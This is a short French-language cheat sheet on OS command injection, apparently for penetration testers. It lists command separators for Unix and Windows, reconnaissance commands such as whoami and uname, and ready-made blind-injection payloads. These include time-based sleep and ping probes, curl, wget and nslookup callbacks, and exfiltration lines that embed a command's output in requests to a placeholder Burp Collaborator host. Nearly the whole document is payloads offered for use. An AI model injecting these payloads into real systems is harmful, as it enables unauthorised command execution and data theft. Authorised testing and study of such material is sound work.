# OS injection

## Séparateurs de commandes

| Unix           | Windows |
| -------------- | ------- |
| &              | &       |
| &&             | &&      |
| \|             | \|      |
| \|\|           | \|\|    |
| ;              | n/a     |
| 0x0a           | n/a     |
| \n             | n/a     |
| \`\<command>\` | n/a     |
| $(\<command>)  | n/a     |

## Commandes basiques pour payloads reflétés

<table><thead><tr><th width="313.3333333333333">Utilité</th><th width="229">Linux</th><th>Windows</th></tr></thead><tbody><tr><td>Nom de l'utilisateur courant</td><td><code>whoami</code></td><td><code>whoami</code></td></tr><tr><td>Version du système d'exploitation</td><td><code>uname -a</code></td><td><code>ver</code></td></tr><tr><td>Config réseau</td><td><code>ifconfig</code></td><td><code>ipconfig /all</code></td></tr><tr><td>Connexions réseau</td><td><code>netstat -an</code></td><td><code>netstat -an</code></td></tr><tr><td>Processus actifs</td><td><code>ps -ef</code></td><td><code>tasklist</code></td></tr></tbody></table>

## En aveugle

### Out-Of-Band interaction

```bash
||curl+https://your.burp.collab.com/||
||nslookup+your.burp.collab.com||
||wget+https://your.burp.collab.com/||
...
```

### Time based

```bash
||sleep+10||
||ping+-c+10+127.0.0.1||
```

### Data exfiltration

```bash
||nslookup+`<command>`.your.burp.collab.com||
||curl+https://your.burp.collab.com/`<command>`||
...
```